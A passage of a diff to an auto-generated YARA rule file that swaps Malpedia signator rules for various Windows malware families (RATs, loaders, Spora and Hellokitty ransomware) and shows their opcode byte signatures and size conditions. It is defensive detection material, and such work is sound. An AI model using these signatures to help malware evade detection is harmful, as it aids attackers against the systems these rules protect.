+		$sequence_4 = { 4d8bc6 418bd7 488bcf e8???????? 8bf0 85c0 0f8850010000 }
+		$sequence_5 = { 488b5d60 488d4c2430 e8???????? 488d4c2420 e8???????? 4883eb20 }
+		$sequence_6 = { b904010000 660b0d???????? 66890d???????? 480fbae71e 7224 0fb7c5 ba0f000000 }
+		$sequence_7 = { 488b5008 488b4810 482bca 48c1f902 493bcd }
+		$sequence_8 = { 488bcb 0f2845e0 660f7f45e0 e8???????? e9???????? c745e805000000 488d0539ef0400 }
+		$sequence_9 = { 41b907000000 4c8bc3 8bd5 ff5018 8bf8 8b442478 }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 1711104
 }
-rule MALPEDIA_Win_Starcruft_Auto : FILE
+rule MALPEDIA_Win_Badflick_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e43c9dba-c687-54c9-a2de-dd0a9a45d60b"
+		id = "1951cb0e-a0c5-59e1-834b-292c5e2f8f2a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.starcruft_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badflick_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "96896309775ea1553e784bf38519d110c5e6ff85ff5070e7ca85592bc9b55bb1"
+		logic_hash = "49a5abd3151b3eb74bfd8f8adfc99feeac10f3374c938c8bdf06a9faa4f988f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126897,32 +126812,32 @@ rule MALPEDIA_Win_Starcruft_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 8b45ec 50 e8???????? 83c404 8b4de8 894dec }
-		$sequence_1 = { 85c0 7505 83c8ff eb17 6a00 8b55ec }
-		$sequence_2 = { ff15???????? 8945e4 837de400 740c e8???????? }
-		$sequence_3 = { 8d4dfc 51 8d95f0f9ffff 52 6a13 8d8538fbffff }
-		$sequence_4 = { 8955fc 8b45f8 8945f0 eb09 8b4df0 83c102 }
-		$sequence_5 = { 83c408 83f8ff 7516 6a00 8d95c8fcffff 52 8d85d0fdffff }
-		$sequence_6 = { 6a36 8b4d08 83c158 51 e8???????? 83c40c 6a40 }
-		$sequence_7 = { e9???????? 6a00 8b95e4f5ffff 52 ff15???????? 8b4d10 8901 }
-		$sequence_8 = { 8d95f0feffff 52 e8???????? 83c40c 6804010000 8d85ecfdffff 50 }
-		$sequence_9 = { 6a06 8d9578fbffff 52 e8???????? 83c410 8d85d0fbffff 50 }
+		$sequence_0 = { 8bd8 ff37 ff15???????? 50 e8???????? 50 ff7508 }
+		$sequence_1 = { ff35???????? ff750c ff75fc ff33 e8???????? 8b7d10 83c418 }
+		$sequence_2 = { 55 8bec ff7508 6a2b }
+		$sequence_3 = { 807d1000 59 5f 5e }
+		$sequence_4 = { be00f00000 56 e8???????? 59 53 8d4df8 51 }
+		$sequence_5 = { 8b4904 03c8 81f9fe34012c 7509 83f805 }
+		$sequence_6 = { 6a3d e8???????? 8bf0 8a4508 59 59 884605 }
+		$sequence_7 = { a5 a5 eb02 33c0 50 6a00 }
+		$sequence_8 = { 8d8548f3ffff 50 ffd7 8d856cf9ffff 50 8d8560f7ffff }
+		$sequence_9 = { a5 a5 e8???????? 59 6a00 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Kingminer_Auto : FILE
+rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dc87ee85-ad64-51c7-a30a-c6bd4d73fed8"
+		id = "be70f5e8-f454-5cf5-9a53-9b79088ce98e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kingminer_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.godzilla_loader_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "a5745ddfac302b5a6ad793ecca6fc94da98fb5fc6ae2a187ff80bbe4b8e2d2c1"
+		logic_hash = "192fb36ce99cb3fd5c305739a3550413e1aac5f25669dd240cdac235353c820b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126936,32 +126851,32 @@ rule MALPEDIA_Win_Kingminer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945f0 c745f400000000 3b0d???????? 0f8d8e010000 68???????? ff15???????? }
-		$sequence_1 = { 8b8db0feffff e8???????? 8b95d8feffff 8b8db0feffff 52 8bf0 e8???????? }
-		$sequence_2 = { 53 8b5f38 f6c301 7570 0fb74706 }
-		$sequence_3 = { 0fb75714 8d4c3a24 85c0 7429 8bf0 }
-		$sequence_4 = { 52 e9???????? a1???????? 6800040000 }
-		$sequence_5 = { 3bf0 741e 68c1000000 ff15???????? 5b }
-		$sequence_6 = { 68???????? ff15???????? 8b7508 c7465c88d00010 }
-		$sequence_7 = { 8b0d???????? 8945ec 8b4624 83c628 }
-		$sequence_8 = { 8975e4 33c0 39b8a0f70010 0f8491000000 }
-		$sequence_9 = { 8b95d0feffff 2b4234 7419 83b9a000000000 7466 50 }
+		$sequence_0 = { 56 57 ff7508 ff15???????? 8bf0 56 }
+		$sequence_1 = { 8d45fc 50 57 6a01 56 ff7508 }
+		$sequence_2 = { 6a00 8bf8 8d45fc 50 57 6a01 56 }
+		$sequence_3 = { 6a01 56 ff7508 8975fc }
+		$sequence_4 = { 53 53 53 6800000088 }
+		$sequence_5 = { a5 ff512c 85c0 756c }
+		$sequence_6 = { a5 50 a5 ff512c 85c0 756c }
+		$sequence_7 = { 8b08 50 ff11 85c0 7527 }
+		$sequence_8 = { 8bec 51 56 57 ff7508 ff15???????? 8bf0 }
+		$sequence_9 = { 53 53 53 53 6800000088 }
 
 	condition:
-		7 of them and filesize < 165888
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Hellokitty_Auto : FILE
+rule MALPEDIA_Win_Roadsweep_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70edbf2a-39f7-5f31-a1a6-369fa9a6babf"
+		id = "6c093c47-8e58-51ee-ae4c-89b38c2f042b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hellokitty_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roadsweep"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roadsweep_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "69c3664f3b1b0dc034046821a230bddd8509bf97c9fd256224c800e384d6c7d3"
+		logic_hash = "0d07cae12c5491ee120ce765fa753d2699b968376031bccf1e21a7a431677bd5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126975,32 +126890,32 @@ rule MALPEDIA_Win_Hellokitty_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89542414 3d00010000 0f8f27010000 8bcb e8???????? 8bf0 }
-		$sequence_1 = { 6a08 58 75a4 5b 5f 5e c9 }
-		$sequence_2 = { 50 ffd6 8bd8 8945fc 83c8ff 3bd8 0f846b020000 }
-		$sequence_3 = { 8b45fc 8b4048 f00fc118 4b 7515 8b45fc 817848c0044200 }
-		$sequence_4 = { 03c8 8b45f0 03ce 8b75fc 894df8 c1c105 8b4034 }
-		$sequence_5 = { 8d4c242c e8???????? 837c243c08 8d442428 0f43442428 33ff 57 }
-		$sequence_6 = { 8b7508 2bdf ba10000000 660f1f440000 8a0c06 8d4001 3248ff }
-		$sequence_7 = { 0fb689303b4200 33f9 333d???????? 33fa 8bd7 89b880000000 33d6 }
-		$sequence_8 = { c1c806 33c8 8b45dc 3345e8 034dac 23f0 3375dc }
-		$sequence_9 = { c1c10e 33c8 8bc2 8b55cc 8bf2 c1e803 33c8 }
+		$sequence_0 = { 89542404 e8???????? 3955cc 89c3 c745b800000000 }
+		$sequence_1 = { e9???????? c7442404???????? c7042404010000 e8???????? 83ec08 e9???????? c744240404010000 }
+		$sequence_2 = { 8b45e8 85d2 0f885d010000 85d2 0f8ea6010000 }
+		$sequence_3 = { 00d2 8b5d08 83d903 8db534ffffff c744240c00000000 29f9 baffffffff }
+		$sequence_4 = { 56 ba01000000 53 83ec50 8b7508 8d742600 8dbc2700000000 }
+		$sequence_5 = { c744241000000000 89542404 893424 e8???????? 8bbd6cffffff }
+		$sequence_6 = { c745cc04100800 891424 e8???????? 83ec04 85c0 }
+		$sequence_7 = { e8???????? 891c24 8d9578fbffff 89542404 c68578fbffff25 c68579fbffff73 c6857afbffff63 }
+		$sequence_8 = { 890424 e8???????? 89b564ffffff 31c9 48 899d6cffffff }
+		$sequence_9 = { 3d???????? 7207 3d???????? 7216 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 160768
 }
-rule MALPEDIA_Win_Helminth_Auto : FILE
+rule MALPEDIA_Win_Ariabody_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5fdf8a25-7bbd-5109-b9cb-02cfb27261a2"
+		id = "b288143a-494f-5110-aa08-78c947a2ffad"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.helminth_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ariabody_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "fef76838e29eb47ff0f2e451721fe0e767720682455a5aea55c0645b1ef1cd31"
+		logic_hash = "01493614906849451d77f5112637b662b1eef5ef050791957456a657828f7e1a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127014,37 +126929,38 @@ rule MALPEDIA_Win_Helminth_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 68e8030000 8907 e8???????? }
-		$sequence_1 = { 2bc6 3bd8 a1???????? 7f5e 8d3c81 }
-		$sequence_2 = { 8bd8 85db 0f84bc000000 8bcb 8d5102 668b01 83c102 }
-		$sequence_3 = { 83e11f c1e106 8b048570750110 80640804fe ff36 e8???????? }
-		$sequence_4 = { 8a441918 8881a8670110 41 ebe8 8975e4 }
-		$sequence_5 = { 56 ff15???????? 56 e8???????? 8b35???????? 83c404 8b0d???????? }
-		$sequence_6 = { 8bca 894c2408 8d9b00000000 668b02 83c202 6685c0 75f5 }
-		$sequence_7 = { 66893441 8b1a ff15???????? 8bc3 8d5002 668b08 }
-		$sequence_8 = { 83f8ff 0f84ac000000 8d442418 50 56 }
-		$sequence_9 = { 8945dc 8d45cc 50 6a02 }
-		$sequence_10 = { 51 e8???????? 8b55e8 03f6 59 }
-		$sequence_11 = { 8bd0 b9???????? 8995c8fbffff 2bd1 }
-		$sequence_12 = { f3a5 8bca 83e103 f3a4 8b7c2414 83ef02 }
-		$sequence_13 = { eb1c 56 ff15???????? 57 ff15???????? }
-		$sequence_14 = { e8???????? 8b75f0 43 59 eb31 }
+		$sequence_0 = { 3ac3 7402 32c3 88040a }
+		$sequence_1 = { 8bd9 e8???????? 8bf8 893b }
+		$sequence_2 = { 8d55fc 03f9 e8???????? 59 85c0 }
+		$sequence_3 = { 0138 115804 eb02 0138 }
+		$sequence_4 = { 55 8bec 83ec50 53 57 8bd9 }
+		$sequence_5 = { ff75d9 8d45cc 50 57 }
+		$sequence_6 = { 56 8d0c30 ffd1 8bc6 5f }
+		$sequence_7 = { 8bf8 893e eb13 8b16 8bcf }
+		$sequence_8 = { 448850d2 448850d3 448850d4 448850d5 448850d6 448858d7 }
+		$sequence_9 = { 33d2 4c8d4c2420 4d895108 4889f1 4533c0 ff9550010000 4c8b542428 }
+		$sequence_10 = { e8???????? ba0a000000 4c8d15e189ffff 385558 }
+		$sequence_11 = { 415c 5f 5e c3 4c89e2 }
+		$sequence_12 = { 48c7c103000080 33d2 4c8d842498000000 4c8d8c24bc010000 4c897020 4c897028 }
+		$sequence_13 = { c78424bc01000000010000 488d8c2498000000 488d542448 ff95b8010000 4989e2 }
+		$sequence_14 = { 85c0 752e 4889e9 4889f2 }
+		$sequence_15 = { 4889742448 4489de 48897c2440 4489d7 4c89642438 4189c4 }
 
 	condition:
-		7 of them and filesize < 479232
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Atmitch_Auto : FILE
+rule MALPEDIA_Win_Buterat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40b30c3c-57b4-5224-a4e5-a107d24cada9"
+		id = "0069324a-e70e-54da-b752-be0a297a08d5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmitch_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buterat_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "71ef7f74c9366c16202f9b9ae280ad39b24b004194d9f9aea8b4282ba76a3264"
+		logic_hash = "2a55e665ba3ad4c5f4e76ca6aa40a42d86bc8aa495194478ad6bc52271aa15de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127058,32 +126974,32 @@ rule MALPEDIA_Win_Atmitch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7407 8b542418 895004 837c242400 740c 8b442420 50 }
-		$sequence_1 = { ff15???????? 8d4c2414 ff15???????? 8d4c2410 ff15???????? }
-		$sequence_2 = { ff15???????? c744242000000000 833d????????02 7f05 e8???????? a1???????? }
-		$sequence_3 = { 8b4818 83c408 51 51 8bcc 8964241c }
-		$sequence_4 = { 50 680300020b ff15???????? 8d4c240e 51 51 8bcc }
-		$sequence_5 = { c645fc01 8b06 8b4804 8b443110 25c0010000 }
-		$sequence_6 = { 6aff 8d4c2414 ff15???????? 6a00 6a0a 8d4c2418 ff15???????? }
-		$sequence_7 = { 8bf8 83c404 33c9 33d2 33c0 6a11 }
-		$sequence_8 = { 8bcc 89642410 68???????? ff15???????? e8???????? 83c404 a1???????? }
-		$sequence_9 = { 8b0e 0fb7412c 83c408 83f809 774d ff2485f4200010 b8???????? }
+		$sequence_0 = { 7644 8b9ea05b4100 8d8e645a4100 8b11 395508 7305 895508 }
+		$sequence_1 = { 7e27 8b04b5e8034100 66833800 7508 8bc3 eb0d 33c0 }
+		$sequence_2 = { 85f6 7508 81ffb7000000 7514 8d8590f5ffff 50 be???????? }
+		$sequence_3 = { ff15???????? 85c0 8b4d14 8901 7505 2145fc }
+		$sequence_4 = { 85c0 0f849c010000 8d4dfc 51 53 68???????? e8???????? }
+		$sequence_5 = { 50 e8???????? 83c414 85c0 744e 68???????? 53 }
+		$sequence_6 = { 397df4 7477 813d????????60010000 7e6b 393d???????? 7463 bb00100000 }
+		$sequence_7 = { 8945fc 53 6800000080 53 53 ff7508 ff35???????? }
+		$sequence_8 = { 50 53 ffd7 b9???????? 8d8500f8ffff e8???????? 6a01 }
+		$sequence_9 = { c3 55 8bec b840180000 e8???????? ff15???????? 66833d????????00 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE
+rule MALPEDIA_Win_Skynet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4e63ffd3-d637-54dc-963b-d590dcc87c41"
+		id = "696c4936-7a3d-5b86-95a5-a0774cacd4ab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socks5_systemz_auto.yar#L1-L105"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skynet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skynet_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "9d56f402c3f1fd51548e0c2bff2c38c0e563ae0abe552efe04d2796d89f7c180"
+		logic_hash = "1d32da1d46f2bb7e98914cbd9405f4812d3bd3786d6edfb45c62833d68ff1301"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127097,30 +127013,32 @@ rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf1 6a4c e8???????? 8bc8 83c404 894c240c c744241800000000 }
-		$sequence_1 = { 50 ff7314 ff7310 e8???????? 8b4310 83c410 }
-		$sequence_2 = { ff10 56 8b35???????? 6a00 ffd6 50 ffd3 }
-		$sequence_3 = { 83c148 e9???????? c3 b8???????? }
-		$sequence_4 = { 8b4dec 83c134 e9???????? 8b542408 8d42e4 8b4ae0 }
-		$sequence_5 = { 8975a0 e9???????? 8b45a0 6aff }
-		$sequence_6 = { 33ed 896c2414 eb0d 50 ff15???????? 8be8 }
-		$sequence_7 = { 8d44240c 50 8d4c2414 e8???????? c744241c01000000 89742420 c74424380f000000 }
+		$sequence_0 = { 4c8ba42438010000 4c8b4c2460 48b8ffffffffffffff7f 4c898c2430010000 4889bc2440010000 4939c4 }
+		$sequence_1 = { 4889d9 e8???????? 4889f1 e8???????? 488d8c24b0000000 e8???????? 4c89f1 }
+		$sequence_2 = { 0fb654243f 4889c8 4883e0fc 4809d0 48894520 e8???????? 488d8c24b0000000 }
+		$sequence_3 = { 488d059c478b00 31d2 4889f1 48894310 4883c028 48898380000000 e8???????? }
+		$sequence_4 = { 4889cb 488d0d21fd8900 e8???????? 4889c2 488b03 488b4008 488b04d0 }
+		$sequence_5 = { 4c894c2428 488d5001 e8???????? 4c8b4c2428 488b442420 4c894c2430 }
+		$sequence_6 = { 488b01 4889cb 480358e8 488d0586478a00 488903 488b05???????? 488d4b18 }
+		$sequence_7 = { 48c783b801000000000000 488983a8010000 0fb787e0000000 488d7b10 4889f9 668983b0010000 488d053dde8d00 }
+		$sequence_8 = { c705????????01000000 4883c010 488905???????? e8???????? 488d35d1c58b00 488b15???????? 664d0f6ec5 }
+		$sequence_9 = { e8???????? 488b4c2460 4c39e9 740f 488b442470 488d540002 e8???????? }
 
 	condition:
-		7 of them and filesize < 1417216
+		7 of them and filesize < 20419584
 }
-rule MALPEDIA_Win_Tiger_Rat_Auto : FILE
+rule MALPEDIA_Win_Tclient_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45a8f301-bb79-5b2b-bc44-a24cf96c6108"
+		id = "650e8891-ed90-5136-bd2f-e9d9bc478c30"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tiger_rat_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tclient_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "86fb8964d90e4f85207407bd6a1343f7cd65992f2c3c62186f5ccbef201af0b2"
+		logic_hash = "8cec1eb16073a2ac15195a2fb3f4612d56f52a89cef4787143a34f4035169950"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127134,38 +127052,32 @@ rule MALPEDIA_Win_Tiger_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883fbff 7425 48c74108ffffffff ba02000000 488bcb }
-		$sequence_1 = { 4883f8ff 740c 83caff 488bc8 ff15???????? 33c0 }
-		$sequence_2 = { 41b831000000 48895c2420 e8???????? 488bcb }
-		$sequence_3 = { 33d2 41b800020000 e8???????? c7832804000020000000 89bb30040000 48c7834c04000000000000 }
-		$sequence_4 = { 0fb745ae 663b0d???????? 750d 663b05???????? }
-		$sequence_5 = { 381a 7505 448bc3 eb11 4983c8ff 0f1f4000 }
-		$sequence_6 = { 2bef 488bcb 4c63c5 e8???????? 442be7 488bce }
-		$sequence_7 = { 49c1eb04 c0e104 0ac1 410fb6cf 0845d6 }
-		$sequence_8 = { 415f 5e c3 8b5650 33c9 41b800100000 }
-		$sequence_9 = { 4898 483de4000000 730f 488d0d1d840000 4803c0 8b04c1 eb02 }
-		$sequence_10 = { 8b4e28 4803cf e8???????? 488bbc24c0000000 }
-		$sequence_11 = { f30f7f4507 0b0d???????? 41b8d0070000 c745f74008027b }
-		$sequence_12 = { 488bdf 48c1fb05 4c8d353a1c0100 83e01f 486bf058 }
-		$sequence_13 = { 488d1578bd0000 488bcb 488905???????? ff15???????? 488bc8 ff15???????? 488d1570bd0000 }
-		$sequence_14 = { 0fb64c05b7 48ffc0 42324c05a7 4883f80f }
-		$sequence_15 = { 4c8d2d166e0100 413bff 7d77 488b0e }
+		$sequence_0 = { ffb5f0fdffff ff95e4fdffff 8bf0 83c40c 85f6 0f85ec020000 8b85f0fdffff }
+		$sequence_1 = { 6a00 50 e8???????? 83c40c c70340000000 8bcb e8???????? }
+		$sequence_2 = { 8d4508 8bcc 50 e8???????? 8d4dcc 885dfc e8???????? }
+		$sequence_3 = { 0f8521feffff 837d1001 0f857a010000 85f6 745f 8b4e04 57 }
+		$sequence_4 = { ff7508 8bd7 8bce e8???????? 59 59 5f }
+		$sequence_5 = { 8bf1 57 84d2 756a b800020000 66858620030000 755c }
+		$sequence_6 = { 8d45c8 50 8d7730 56 8d5750 8d4de8 e8???????? }
+		$sequence_7 = { 8b049dc0a04700 0fb6440828 83e001 0f848d000000 b8ffffff7f 3b4510 1bc0 }
+		$sequence_8 = { 3bd8 7e2c 8d95b0feffff 8d8d60faffff e8???????? 8b9da8faffff 8bf8 }
+		$sequence_9 = { 33c0 66898625030000 89862a030000 888627030000 888622030000 884660 88467c }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 1063936
 }
-rule MALPEDIA_Win_Latentbot_Auto : FILE
+rule MALPEDIA_Win_Spora_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1503e41-08e6-5adf-a875-66636893fe66"
+		id = "eb2e8bb4-ead2-5b5f-8d4b-4b5ca032457e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.latentbot_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spora_ransom_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "c8242f2d9f053ebc06f18c04d8c5d76f7cd68171deb734a7f00fb470d56dc52c"
+		logic_hash = "4e1870b731d039931c3cd87b8cbae836b84abbb8438fb88731c5b4fc00862572"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127179,32 +127091,32 @@ rule MALPEDIA_Win_Latentbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f c3 55 8bec 8b4604 81ecdc020000 85c0 }
-		$sequence_1 = { 7505 be04000000 56 6800300000 8d44241c 50 6a00 }
-		$sequence_2 = { 8d4c2410 51 6aff ffd2 33c0 8703 }
-		$sequence_3 = { 8bc3 e8???????? 299ff42a0000 015e0c 295e10 015e14 8b87f42a0000 }
-		$sequence_4 = { ff5554 395d70 0f8689000000 833d????????06 752c 833d????????03 7434 }
-		$sequence_5 = { 83ec08 3bc2 7769 8d4c2404 51 8d542404 }
-		$sequence_6 = { 50 e8???????? 0145f8 837df805 8945e8 72e7 }
-		$sequence_7 = { 7814 8d5002 85d2 7406 8d440802 eb02 }
-		$sequence_8 = { 8b413c 53 03c1 0fb74814 56 0fb77006 33db }
-		$sequence_9 = { 66890477 46 3bf3 72ea 33c0 66890477 }
+		$sequence_0 = { 50 8d45f0 50 ff5508 }
+		$sequence_1 = { 7436 03fb 83ff0c 72ec }
+		$sequence_2 = { 53 56 ff7508 e8???????? 85c0 7422 56 }
+		$sequence_3 = { ff36 57 ff15???????? 57 e8???????? }
+		$sequence_4 = { 83fe0a 72e4 5e c9 c3 }
+		$sequence_5 = { 8bf0 85f6 7445 8365fc00 8d45fc 50 57 }
+		$sequence_6 = { 8d45f0 50 ff5508 d1eb 46 83fe1a 72c7 }
+		$sequence_7 = { 740e 8b45fc 8b4010 0fb6f0 }
+		$sequence_8 = { 0bf0 57 ff15???????? 5f 8bc6 }
+		$sequence_9 = { 741f ff36 ff15???????? 85c0 7413 0fb600 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Scavenger_Auto : FILE
+rule MALPEDIA_Win_Backconfig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d846177f-40f0-5608-9af6-8e72a353dfb4"
+		id = "18fd149c-ad9b-5433-8651-ac1dcd92de05"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scavenger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scavenger_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backconfig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backconfig_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "e670ed837cdbf1f563e9cd77410039750eec52dd374d49f9838ffc16cf920061"
+		logic_hash = "dc29e43fa81d60d5f53e6f4d5e158937c417e8f12650929b20d71338a8cb5ead"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127218,32 +127130,32 @@ rule MALPEDIA_Win_Scavenger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb6c0 85c0 7421 488b442430 488b00 4889442458 488b442458 }
-		$sequence_1 = { 488b442428 48c7401800000000 488b8424a8000000 488b4010 4889442470 488b8424a8000000 4889442430 }
-		$sequence_2 = { 4889442420 488b8c2410010000 e8???????? 4839842420010000 7606 e8???????? }
-		$sequence_3 = { 4889442440 488b442430 4883c010 4889442448 }
-		$sequence_4 = { 4889442438 e9???????? 33d2 b80f000000 b902000000 48f7f1 488b4c2430 }
-		$sequence_5 = { 488b442428 48c7401800000000 488b8424a8000000 488b4010 }
-		$sequence_6 = { 4889442420 488b442420 4889442448 488b442420 4883c008 4889442450 }
-		$sequence_7 = { 4889442468 48c7442430ffffffff 488b442430 4889442478 }
-		$sequence_8 = { 488378180f 760a c744243001000000 eb08 c744243000000000 0fb6442430 88442420 }
-		$sequence_9 = { 4883ec60 488b442470 4889442448 488b442478 4889442438 488b442438 }
+		$sequence_0 = { a1???????? 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff }
+		$sequence_1 = { e8???????? 8b4de4 83c40c 6bc930 8975e0 8db1682a4100 }
+		$sequence_2 = { 8a15???????? 8d8569ffffff 6a00 50 898d64ffffff 889568ffffff }
+		$sequence_3 = { c1f805 8d1485c0504100 8b0a 83e61f c1e606 03ce }
+		$sequence_4 = { 8bc3 c1f805 8d3c85c0504100 8bf3 83e61f c1e606 8b07 }
+		$sequence_5 = { 8b0d???????? 8b15???????? 8985f0feffff a1???????? 6a51 8985fcfeffff 898df4feffff }
